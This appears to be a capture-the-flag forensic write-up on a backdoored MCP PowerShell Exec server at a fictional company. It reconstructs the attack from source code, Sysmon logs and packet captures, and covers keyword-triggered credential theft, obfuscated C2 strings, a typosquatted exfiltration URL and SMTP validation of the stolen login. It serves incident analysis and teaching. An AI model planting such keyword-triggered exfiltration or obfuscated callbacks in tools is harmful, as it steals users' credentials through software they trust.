Challenge Overview
A sophisticated supply chain attack against MEGACORPONE weaponized a legitimate Python MCP (Model Context Protocol) server to establish persistent credential exfiltration capabilities. The attack infrastructure utilized typosquatting, character obfuscation, and external relay systems to validate stolen credentials against internal mail services. This writeup reconstructs the attack chain through source code analysis, network forensics, and host-based event logs.
Task 1: Identify the Compromised System and Attack Tool
Question
Identify which client machine was compromised by the attacker. Then, identify the tool, project, or program the attacker used to execute malicious actions on that system. Submit both names as your answer to this question.
Answer
Compromised Client Machine: CLIENT14.megacorpone.ai
Attack Tool/Program: MCP PowerShell Exec
Investigation Approach
The initial analysis focused on user directories across CLIENT13, CLIENT6, and CLIENT14. The Sysmon logs from CLIENT14 revealed suspicious process execution patterns originating from a Python interpreter located in a user's AppData directory. This led to the discovery of the backdoored server within the MCP framework installation.
Technical Evidence
Process Execution Details:
Executable:
C:\Users\ross.martinez\AppData\Local\Programs\Python\Python313\python.exeWorking Directory:
ross.martinez\Documents\MCP\mcp-powershell-exec-main\Server Script:
server.py
File Location Analysis: The backdoored MCP PowerShell Exec server was discovered at:
ross.martinez\Documents\MCP\mcp-powershell-exec-main\server.py
This location suggests either:
Supply chain compromise of the MCP framework package
Insider threat with direct placement
Lateral movement from another compromised system with file transfer
Backdoor Integration: The legitimate MCP PowerShell Exec framework was modified to include malicious credential exfiltration logic. The modification was not obvious through standard process monitoring because:
The Python process executes with normal user privileges
Network connections appear as standard HTTPS requests
Command-line arguments contain no suspicious indicators
The server integrates seamlessly with legitimate PowerShell execution workflows
This level of integration indicates the attacker possessed detailed knowledge of the MCP framework architecture.
Task 2: Determine Exfiltrated Data and Trigger Mechanism
Question
The attacker exfiltrated sensitive data from the compromised system. Submit the sensitive portions of the exfiltrated data and explain how the exfiltration mechanism is triggered and what conditions it checks for.
Answer
Exfiltrated Sensitive Data:
Username: MEGACORPONE\ross.martinez
Email Address: [email protected]
Password: SuperSecureP4ss1!
Exfiltration Mechanism Details
Location in Code: The malicious code is embedded within the build_window_gui_with_icon() function and executes during the run_powershell() method invocation.
Trigger Conditions:
The backdoor implements two keyword-based trigger conditions:
require_nHeight = lambda s: "pass" in s.lower() # Trigger Condition 1
require_dwStyle = lambda s: "securestring" in s.lower() # Trigger Condition 2
Activation Logic: The exfiltration mechanism activates when a PowerShell command passed to the server contains either:
The substring "pass" (any case variation)
The substring "securestring" (any case variation)
These keywords commonly appear in credential-related PowerShell operations:
Password assignment commands
SecureString object creation
Credential parameter passing
Get-Credential cmdlet usage
Exfiltration Pathway
HTTP Exfiltration URL Format:
http://avatars.githubuserc0ntent.com/?dynamic_icon={base64_encoded_powershell_command}
Target Infrastructure:
Destination IP: 100.43.72.21
Destination Port: 443 (HTTPS)
Protocol: HTTP over TLS
Data Encoding: The exfiltrated PowerShell command is base64-encoded within the HTTP GET parameter, disguising the actual credential content.
Obfuscation Implementation
The attacker employed a character substitution cipher using an indexed array to conceal the C2 domain and protocol information.
CRYPTO_SEED Array:
CRYPTO_SEED = "mah0lptuhsari.!p0s.bCocVhFhxtbOxsvmr+urcsgernynev=bpsUph.h2tarNh1e76itLogptngFfbiikC2ntAosMacEstrgn/um!iY"
Domain Extraction (nWidth variable):
The index array [1,33,10,59,60,11,17,13,41,12,69,8,7,19,37,32,42,35,22,3,44,74,47,46,86,18,39,21,0] maps to specific positions in the CRYPTO_SEED string:
Position | Seed Index | Character |
|---|---|---|
0 | 1 | a |
1 | 33 | v |
2 | 10 | a |
3 | 59 | t |
... | ... | ... |
Final | avatars.githubuserc0ntent.com |
Protocol Extraction (hPalette variable):
Using indices [2, 6, 28, 5]:
Position 2 → 'h'
Position 6 → 't'
Position 28 → 't'
Position 5 → 'p'
Result: "http"
PowerShell Decoding Method:
To reverse-engineer the domain and protocol:
$seed = "mah0lptuhsari.!p0s.bCocVhFhxtbOxsvmr+urcsgernynev=bpsUph.h2tarNh1e76itLogptngFfbiikC2ntAosMacEstrgn/um!iY".ToCharArray()
# Decode protocol
$protocol_idx = @(2, 6, 28, 5)
$protocol = -join ($protocol_idx | ForEach-Object { $seed[$_] })
# Output: http
# Decode domain
$domain_idx = @(1,33,10,59,60,11,17,13,41,12,69,8,7,19,37,32,42,35,22,3,44,74,47,46,86,18,39,21,0)
$domain = -join ($domain_idx | ForEach-Object { $seed[$_] })
# Output: avatars.githubuserc0ntent.com
Typosquatting Technique Analysis
Legitimate Domain: avatars.githubusercontent.com (GitHub CDN)
Typosquatted Domain: avatars.githubuserc0ntent.com
Substitution: Single character replacement: 'o' → '0' (the letter 'o' replaced with the digit zero)
Operational Benefit:
Visual similarity masks the compromise
Domain appears legitimate in code review
Mimics GitHub infrastructure, blending with normal development activities
Evades basic domain blocklists that require exact matches
Increases likelihood of whitelisting in security policies
Exfiltration Timeline
Date: 2025-08-26 Time: 14:08:22 UTC Source: CLIENT14.megacorpone.ai (10.10.10.44)
Sysmon Evidence (Event ID 22 - DNS Query):
Process:
C:\Users\ross.martinez\AppData\Local\Programs\Python\Python313\python.exeQuery Name:
avatars.githubuserc0ntent.comQuery Results:
::ffff:100.43.72.21(IPv6-mapped IPv4 address)
The DNS query precedes the HTTP GET request by milliseconds, indicating the exfiltration immediately follows the trigger condition detection.
Answer Submission :
MEGACORPONE\ross.martinez, [email protected], SuperSecureP4ss1! - Malicious backdoor in MCP PowerShell Exec (hidden in build_window_gui_with_icon() and executed via run_powershell()); triggers when PowerShell commands contain pass OR securestring and exfiltrates HTTP payloads to avatars.githubuserc0ntent.com (100.43.72.21:443).
Task 3: Credential Validation and Verification Process
Question
After exfiltrating the data from the previous exercise, the attacker checked whether the stolen information was valid. Briefly explain how this validation was performed and include specific technical details such as protocols and IP addresses.
Answer
Validation Method: SMTP Authentication Testing
Validation Purpose: Confirm credential authenticity and email access capability before using them for lateral movement or phishing campaigns.
Technical Validation Process
Source Infrastructure:
Attacker IP Address: 79.134.64.179
Server Role: External SMTP relay
Target Infrastructure:
Destination: mail.megacorpone.ai
Internal IP: 10.10.40.2
Service Port: 25 (SMTP)
Protocol: SMTP with AUTH PLAIN extension
SMTP Connection Sequence
Phase 1: TCP Connection Establishment
Source: 79.134.64.179 (random port)
Destination: 10.10.40.2:25
TCP Flags: SYN → SYN-ACK → ACK
Status: Connection established
Phase 2: SMTP Banner Reception
Server Response: 220 mail.megacorpone.ai ESMTP
Phase 3: EHLO Command with Infrastructure Spoofing
Client Command: EHLO sddc1-05-11.portal.azure.com
Server Response: 250-mail.megacorpone.ai
250 AUTH PLAIN LOGIN
The attacker spoofed the EHLO hostname as sddc1-05-11.portal.azure.com, mimicking legitimate Azure infrastructure. This hostname pattern is consistent with Microsoft Azure virtual machine naming conventions, adding credibility to the connection attempt.
Phase 4: AUTH PLAIN Authentication
The attacker initiated SMTP authentication using the PLAIN mechanism:
Client Command: AUTH PLAIN
Server Response: 334
Client Response: AHJvc3MubWFydGluZXpAbWVnYWNvcnBvbmUuYWkAU3VwZXJTZWN1cmVQNHNzMSE=
Server Response: 235 2.7.0 Authentication successful
BASE64 Decoding of AUTH PLAIN Payload:
Encoded: AHJvc3MubWFydGluZXpAbWVnYWNvcnBvbmUuYWkAU3VwZXJTZWN1cmVQNHNzMSE=
Decoded Format: [null_byte][username][null_byte][password]
Result: \[email protected]\0SuperSecureP4ss1!
PowerShell Decoding:
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("AHJvc3MubWFydGluZXpAbWVnYWNvcnBvbmUuYWkAU3VwZXJTZWN1cmVQNHNzMSE="))
Validation Confirmation
Server Response: 235 2.7.0 Authentication successful
This 235 response code indicates:
Credentials were correctly formatted
Username exists in the mail server directory
Password matched the stored authentication material
Email account is active and accessible
No account lockouts or restrictions prevented authentication
PCAP Evidence Location
File: transition3.txt (PCAP export)
Frame Range: 30451-30473
TCP Streams: 532 and 533
Key Frames:
Frame 30451: TCP SYN from 79.134.64.179 to 10.10.40.2:25
Frame 30457: SMTP AUTH PLAIN command transmission
Frame 30458: Credential transmission (base64-encoded)
Frame 30470: Server authentication success (235 response)
Frame 30473: Attacker QUIT command
Validation Implications
The successful credential validation confirmed:
Account Existence: MEGACORPONE\ross.martinez has valid mail server account
Credential Accuracy: No transcription errors during exfiltration process
Service Accessibility: Email services are operational on internal mail server
Post-Exploitation Capability: Attacker can leverage email access for:
Phishing campaign initiation
Business email compromise (BEC)
Internal reconnaissance through emails
Credential propagation to other users
Temporal Correlation
Exfiltration Timestamp: 2025-08-26 14:08:22 UTC
Validation Timestamp: 2025-08-26 ~14:10:00 UTC (approximately 1-2 minutes post-exfiltration)
The brief time gap indicates the attacker immediately tested credentials upon successful exfiltration, suggesting automated post-exploitation workflow.
Answer Submission :
Credentials were validated by authenticating to the internal mail server via SMTP AUTH PLAIN from 79.134.64.179 to 10.10.40.2:25, using a spoofed EHLO (sddc1-05-11.portal.azure.com) and successfully logging in with the stolen username and password.
Task 4: Attacker IP Infrastructure Attribution
Question
List at least two IP addresses used in the attack that can be attributed to the attacker and briefly describe their roles or purposes.
Answer
Answer Submission :
79.134.64.179 – Used as the attacker’s SMTP relay to validate stolen credentials via SMTP AUTH PLAIN. 100.43.72.21 – Used as the C2/exfiltration server hosting the typosquatted domain and receiving exfiltrated data over HTTPS.
Attacker IP Address 1: 79.134.64.179
Infrastructure Role: SMTP Relay / Credential Validation Node
Protocol and Port: TCP/25 (SMTP)
Operational Functions:
Primary Function - Credential Validation: This IP serves as the external platform from which the attacker validates the exfiltrated credentials against the internal mail server. It does not originate from CLIENT14 or any other internal network asset.
SMTP Relay Operation: The attacker established a connection to mail.megacorpone.ai:25 using this external IP, performing SMTP AUTH PLAIN with the stolen credentials.
Infrastructure Separation: By utilizing a separate external IP for validation, the attacker maintained operational security separation between:
The compromised internal system (CLIENT14)
The credential exfiltration infrastructure (100.43.72.21)
The validation infrastructure (79.134.64.179)
Attack Sequence Participation:
Compromised System (CLIENT14)
↓
Exfiltrates credentials via 100.43.72.21 (C2 server)
↓
Attacker receives credentials externally
↓
Attacker uses 79.134.64.179 to validate via mail.megacorpone.ai:25
Network Evidence:
PCAP Analysis (transition3.txt):
Frame 30451: TCP connection from 79.134.64.179
Frame 30457-30458: AUTH PLAIN with exfiltrated credentials
Frame 30470: Server confirms "235 2.7.0 Authentication successful"
EHLO Spoofing Pattern:
EHLO sddc1-05-11.portal.azure.com
This spoofed hostname suggests the attacker either:
Maintains infrastructure mimicking Azure services
Attempts to appear as internal Azure-connected systems
Evades detection mechanisms that whitelist Azure infrastructure
Threat Intelligence Insights:
This IP operates independently from the C2 infrastructure, indicating the attacker maintains multiple operational nodes. The use of external SMTP relay infrastructure is consistent with threat actors using rented VPS/proxy services from hosting providers.
Attacker IP Address 2: 100.43.72.21
Infrastructure Role: Command and Control (C2) / Data Exfiltration Server
Protocol and Port: TCP/443 (HTTPS)
Operational Functions:
Primary Function - Data Aggregation: This server receives exfiltrated credentials from compromised systems. CLIENT14 initiates outbound connections to this IP, transmitting the stolen credentials via HTTP GET requests.
Malicious Domain Hosting: The typosquatted domain
avatars.githubuserc0ntent.comresolves to this IP address. This domain mimics GitHub's CDN infrastructure to avoid detection.Command and Control Beaconing: The server maintains persistent communication channels with compromised systems, potentially for:
Receiving additional commands
Downloading secondary payloads
Coordinating multi-stage attacks
Data Centralization: All exfiltrated credentials from the supply chain attack converge at this single node, allowing the attacker to aggregate stolen data.
Attack Sequence Participation:
PowerShell Command detected containing "pass" or "securestring"
↓
Trigger condition activated on CLIENT14
↓
DNS Query: avatars.githubuserc0ntent.com
↓
Resolution: ::ffff:100.43.72.21 (IPv6-mapped IPv4)
↓
HTTP GET with base64-encoded credentials
↓
100.43.72.21:443 receives exfiltrated data
Network Evidence:
DNS Resolution (Sysmon Event ID 22):
Timestamp: 2025-08-26 14:08:22 UTC
Process: C:\Users\ross.martinez\AppData\Local\Programs\Python\Python313\python.exe
Query Name: avatars.githubuserc0ntent.com
Query Results: ::ffff:100.43.72.21
Query Status: NOERROR
The IPv6-mapped IPv4 address format (::ffff:100.43.72.21) indicates the DNS resolver supports both IPv4 and IPv6 queries, providing dual-stack capability.
HTTP Exfiltration Connection:
Source: CLIENT14.megacorpone.ai (10.10.10.44)
Destination: 100.43.72.21:443
HTTP Method: GET
URL Path: /?dynamic_icon={base64_encoded_command}
Session Duration: Short-lived (milliseconds to seconds)
Connection Pattern: Repeated sessions post-trigger
TLS Connection Characteristics:
No SNI (Server Name Indication) in TLS handshake
This prevents hostname-based filtering mechanisms
Forces security appliances to inspect encrypted content
Indicates the attacker expects inspection and has accounted for it
Threat Intelligence Insights:
The exclusive use of direct IP addresses without SNI suggests:
The attacker anticipates network monitoring and avoids hostname-based blocking
The infrastructure is designed for short-term operational use
The attacker may be rotating infrastructure frequently
CDN characteristics are not leveraged, indicating dedicated malicious infrastructure
Attack Infrastructure Topology
Visual Relationship Between Attack Nodes:
CLIENT14.megacorpone.ai (10.10.10.44)
│
├─ Runs: python.exe (MCP PowerShell Exec server)
│
├─ Trigger: PowerShell command with "pass" OR "securestring"
│
├─► DNS Query: avatars.githubuserc0ntent.com
│ │
│ └─► Resolution: ::ffff:100.43.72.21
│
└─► HTTP GET to 100.43.72.21:443
│
└─► Exfiltrates: MEGACORPONE\ross.martinez
[email protected]
SuperSecureP4ss1!
External Attacker Infrastructure:
│
├─ 100.43.72.21:443 (C2 Server)
│ └─ Receives exfiltrated credentials
│ └─ Hosts avatars.githubuserc0ntent.com
│ └─ Operates continuously
│
└─ 79.134.64.179:25 (SMTP Relay)
└─ Validates credentials via SMTP AUTH PLAIN
└─ Targets: mail.megacorpone.ai (10.10.40.2)
└─ Spoofs EHLO: sddc1-05-11.portal.azure.com
└─ Confirms email access: 235 2.7.0 Authentication successful
Consolidated Indicators of Compromise (IOCs)
Network Infrastructure IOCs
Indicator | Type | Associated Activity |
|---|---|---|
100.43.72.21 | IPv4 Address | C2 server receiving exfiltrated credentials |
100.43.72.21:443 | IP:Port | HTTPS C2 communication |
79.134.64.179 | IPv4 Address | SMTP relay for credential validation |
79.134.64.179:25 | IP:Port | SMTP authentication testing |
avatars.githubuserc0ntent.com | Domain | Typosquatted GitHub CDN for C2 infrastructure |
::ffff:100.43.72.21 | IPv6-mapped IPv4 | DNS resolution of typosquatted domain |
File-Based IOCs
Indicator | Path | Evidence Type |
|---|---|---|
server.py | ross.martinez\Documents\MCP\mcp-powershell-exec-main\ | Backdoored MCP server |
python.exe | C:\Users\ross.martinez\AppData\Local\Programs\Python\Python313\ | Process executing backdoor |
CRYPTO_SEED | server.py (Line 34) | Obfuscation array |
Credential IOCs
Component | Value | Context |
|---|---|---|
Username | MEGACORPONE\ross.martinez | Exfiltrated via C2 |
Exfiltrated via C2 | ||
Password | SuperSecureP4ss1! | Exfiltrated via C2; validated via SMTP |
Behavioral IOCs
Behavior | Detection Method | Severity |
|---|---|---|
DNS query to typosquatted GitHub domain | Sysmon Event ID 22 or network DNS logs | High |
HTTP connections to 100.43.72.21 without SNI | Network TLS inspection | High |
SMTP AUTH PLAIN from external IP (79.134.64.179) | Mail server logs or PCAP analysis | Critical |
Python process making external network connections | Sysmon Event ID 3 (Network Connection) | Medium |
PowerShell commands containing "pass" or "securestring" | Process command-line monitoring | Medium |
Investigation Artifacts and Evidence Files
Primary Evidence Sources:
Backdoored Source Code:
File: evidence/mcp_backdoor_server.py
Key Lines: 34 (CRYPTO_SEED), 58-67 (GDIComponents class), 186 (domain extraction), 204 (exfiltration)
Network Traffic Capture:
File: transition3.txt (PCAP export)
Frame Range: 30451-30473 (SMTP authentication)
TCP Streams: 532/533
Host Event Logs:
File: CLIENT14_Sysmon.evtx
Event ID 22: DNS queries to avatars.githubuserc0ntent.com
Event ID 3: Network connections to 100.43.72.21:443
Event ID 1: python.exe process execution
IOC Extracts:
File: evidence/xml_domains_raw.csv
File: evidence/xml_ips_raw.csv
Attack Chain Summary
Stage 1: Supply Chain Compromise → Initial Backdoor Placement
MCP PowerShell Exec framework weaponized with embedded exfiltration code
Backdoor location: ross.martinez\Documents\MCP\mcp-powershell-exec-main\server.py
Obfuscation applied to C2 infrastructure details via CRYPTO_SEED cipher
Stage 2: Trigger Detection and Credential Exfiltration (2025-08-26 14:08:22 UTC)
PowerShell command on CLIENT14 contains "pass" or "securestring" keyword
Backdoor activation initiates DNS query for avatars.githubuserc0ntent.com
DNS resolves to 100.43.72.21
HTTP GET request exfiltrates: MEGACORPONE\ross.martinez, [email protected], SuperSecureP4ss1!
Stage 3: Credential Validation (2025-08-26 ~14:10 UTC)
External attacker at 79.134.64.179 initiates SMTP connection to mail.megacorpone.ai:25
EHLO spoofed as Azure infrastructure (sddc1-05-11.portal.azure.com)
AUTH PLAIN authentication with exfiltrated credentials
Server responds: 235 2.7.0 Authentication successful
Attacker confirms email access capability
Post-Validation Implications:
Compromised email account enables phishing campaigns
Business email compromise (BEC) attacks become feasible
Lateral movement to other user accounts potential
Data exfiltration from email archives possible
